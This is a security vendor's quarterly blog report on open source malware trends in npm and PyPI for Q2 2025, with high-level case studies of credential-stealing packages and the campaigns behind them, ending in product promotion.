In the second quarter of 2025, Sonatype uncovered 16,279 pieces of open source malware, bringing the total number of malicious packages identified by our automated detection systems to 845,204 and counting. Once again, data exfiltration emerged as the dominant tactic, reinforcing a persistent and growing trend in software supply chain attacks targeting developers and CI/CD environments.
These threats are a form of open source malware — malicious code intentionally published to public repositories like npm and PyPI. Often disguised as useful packages, open source malware is engineered to compromise systems, steal data, or provide backdoor access during development or deployment.
This post is part of our ongoing Open Source Malware Index series, where we report quarterly on malware trends identified by Sonatype's automated systems. If you missed our Q1 2025 edition, we covered a surge in malicious packages targeting developer environments with credential theft and persistent access.
Our Q2 findings show attackers are doubling down on these tactics, using automation, social engineering, and sophisticated obfuscation techniques to target developers and their environments. Clearly, data exfiltration is not going away.
Q2 2025 at a glance
From April 1 through June 30, 2025, Sonatype uncovered 16,279 pieces of open source malware. This number parallels the more than 17,000 malicious packages discovered in Q1 2025 and represents a staggering 188% increase compared to Q2 of last year.
Overall, Sonatype has observed a shift away from crypto miners, code injection malware, and droppers as attackers focus their efforts on data — both exfiltration and corruption.
Key findings from the quarter include:
-
Data exfiltration remained the most common threat, accounting for 55% of all packages. Over 4,400 packages were specifically designed to steal secrets, personally identifiable information, credentials, and API tokens.
-
Malware targeting data corruption doubled in frequency, making up 3% of total malicious packages — more than 400 unique instances.
-
Crypto miners declined slightly, representing 5% of the packages, as attackers shift toward more profitable and persistent attack vectors.
-
Sonatype attributed 107 malicious packages to the Lazarus Group, an APT linked to the North Korean government. These packages accounted for over 30,000 known downloads.
What malware is doing: Spotlight on data exfil
Many of the malicious packages uncovered this quarter used advanced techniques for exfiltrating sensitive data.
These include:
-
Exfiltrating .git-credentials, AWS secrets, and environment variables.
-
Targeting developer systems to harvest credentials used in CI/CD pipelines.
-
Using time-delayed payloads and encrypted transmissions to avoid detection.
Why developers are a prime target
Malware attacks are often built with specific targets in mind. In traditional phishing scenarios, the target might be an administrative employee receiving an urgent message to download a file on behalf of a CEO. But in the case of open source malware, developers are the primary targets, and that targeting explains much of the behavior we see in these packages.
According to Sonatype Principal Security Researcher Garrett Calpouzos, "While it's possible a developer's machine could contain proprietary code that a threat actor might want, the odds of finding and monetizing something useful in an automated attack are low. However, developers have something else attackers really want: secrets and keys, often in predictable locations."
"As a result, we continue to see a large volume of malware targeting environment variables, config files, and other common places used by CI/CD tools and cloud services to store sensitive information. Once attackers collect these credentials, they can attempt unauthorized access to cloud accounts, APIs, databases, and internal systems, opening the door to broader compromise and exploitation."
Case in point: A CryptoJS imposter turned crypto‑stealer
In April 2025, Sonatype's automated malware detection systems flagged a malicious npm package named crypto-encrypt-ts, which masqueraded as a legitimate revival of the widely used but unmaintained CryptoJS library. Analyzed by Sonatype Security Researcher Jeff Thornhill, and tracked as sonatype-2025-001329, the package quickly gained traction — accumulating nearly 1,928 downloads — before analysis revealed it was stealthily harvesting a range of sensitive information, including crypto wallet details, MongoDB connection strings, and environment variables.
Once installed, crypto-encrypt-ts linked to the Better Stack logging service (formerly Logtail) to exfiltrate stolen data to a remote endpoint under the attacker's control. It selectively targeted wallets with balances over 1,000 units and embedded cron-style persistence using pm2 to run indefinitely. This case illustrates a key Q2 trend: attackers increasingly deploy targeted exfiltration tactics within deceptive, brand-mimicking open source components. Read more in our detailed blog post.
Sonatype uncovers more in the Yeshen-Asia malware campaign
In a sprawling six-month campaign dubbed "Yeshen-Asia," a suspected Chinese threat actor deployed over 60 malicious npm packages masquerading as innocuous developer tools. These packages were published through dozens of unique accounts, all using different emails that traced back to the yeshen.asia domain and linked to a common C2 infrastructure. The first wave appeared between December 2024 and April 2025, with early examples like next-refresh-token, serve-static-corell, and openssl-node remaining live on npm well after their initial detection.
While public reporting from Safety and OSV initially identified around 60 packages tied to this campaign, Sonatype discovered an additional 35 packages not included in those disclosures. These were flagged by Sonatype's Release Integrity automated malware detection system and linked through shared infrastructure, including matching IP addresses and email domains associated with @yeshen.asia. Notable additions include packages like jna, lme4, adjksc, and pdfplumber, among many others.
These packages followed the same pattern: Each was published from a distinct author account, each hosted just one malicious component, and all communicated with infrastructure behind Cloudflare-protected yeshen.asia domains. One npm author alone accumulated over 23,000 installs before takedown, demonstrating how stealthy and widespread this campaign became.
Although no novel techniques were observed in this second wave, the level of automation and infrastructure reuse reflect a deliberate, persistent campaign focused on credential theft and secret exfiltration. Sonatype customers were protected from these threats as soon as they were published, and in some cases long before many appeared in public reports.
The Yeshen-Asia campaign is a clear example of how modern attackers blur the lines between legitimate packages and malicious implants, slipping through registry defenses and targeting developers where they are most vulnerable.
Lazarus Group packages continue targeting open source registries
In late Q2 2025, Sonatype began detecting a consistent stream of malicious packages attributed to the Lazarus Group, a North Korea-linked advanced persistent threat (APT) known for credential exfiltration and remote code execution (RCE). Over the past three months, Sonatype detected and logged 107 malicious components associated with Lazarus across both npm and PyPI, using deceptive names that mimic configuration or plugin utilities, such as http-parse, node-orm-mongoose, vite-meta-plugin, and mainx. This set of more than 100 packages has over 30,050 total known downloads.
Notably, all observed packages point back to a shared source codebase associated with earlier Lazarus-linked activity, confirming that this is not isolated but part of an ongoing campaign. These packages are designed to steal credentials and execute arbitrary code, enabling attackers to compromise developer machines or CI/CD infrastructure. Although the exact scale of impact remains under investigation, the consistent appearance of these packages underscores the continued abuse of open source ecosystems by nation-state actors.
We are working closely with our internal research team to further analyze the payloads and attribution signals. Sonatype customers remain protected by default thanks to proactive identification and blocking of these malicious components.
Why it matters
Open source components continue to be foundational in modern software development.
But as usage grows, so do the opportunities for malicious actors to exploit trust and automate their attacks.
Q2 data shows a clear trend: attackers are refining exfiltration-focused malware to harvest secrets and credentials, enabling downstream attacks like supply chain breaches or cloud account takeovers.
Sonatype blocks open source malware
From credential-stealing scripts to packages engineered to silently exfiltrate developer secrets, Q2 2025 revealed that data exfiltration remains the most persistent and targeted threat in the open source ecosystem.
Attackers are continuously refining their techniques — leveraging obfuscated payloads, impersonation tactics, and zero-day evasion methods to embed spyware into widely used public registries like npm and PyPI.
While these threats often bypass traditional antivirus tools, organizations using Sonatype Repository Firewall remain protected. Powered by machine learning and real-time behavioral analysis, our automated detection systems block both known and emerging malware before it ever reaches your developers.
In total, Sonatype Repository Firewall helped customers prevent 88,150 open source malware attacks in Q2 2025. The majority (49%) targeted government and public sector entities, followed by 31% aimed at financial services. These numbers reflect the high stakes of securing modern software pipelines, especially in critical and regulated industries.
To secure your software supply chain from development through production, pair Sonatype Repository Firewall with Sonatype Lifecycle for continuous monitoring, policy enforcement, and governance across all your open source dependencies.
